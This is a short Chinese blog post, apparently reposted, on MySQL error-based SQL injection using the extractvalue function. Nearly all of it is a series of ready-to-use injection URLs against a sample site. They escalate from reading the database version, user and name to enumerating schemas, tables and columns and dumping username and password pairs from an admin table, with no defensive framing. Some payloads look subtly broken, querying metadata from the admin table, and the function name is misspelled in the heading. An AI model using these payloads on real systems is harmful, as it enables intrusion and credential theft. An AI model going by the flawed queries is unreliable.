21、注入篇————MYSQL数据库Extravtvalue报错注入

MYSQL数据库注入攻击示例
转载 于 2018-03-02 19:30:14 发布 · 1.6k 阅读 · 4

本文提供了多个利用MYSQL数据库的Extravtvalue函数进行SQL注入攻击的例子,包括查询数据库版本信息、获取用户信息等。这些例子展示了如何通过构造特定的URL参数来非法获取数据库中的敏感信息。

MYSQL数据库Extravtvalue报错注入

查询数据库版本信息

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))

链接用户

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select user()),0x7e))

链接数据库

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select database()),0x7e))

爆库

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM admin limit 0,1)))

爆表

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM admin limit 0,1)))

爆字段

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM admin limit 0,1)))

爆内容

http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))


评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值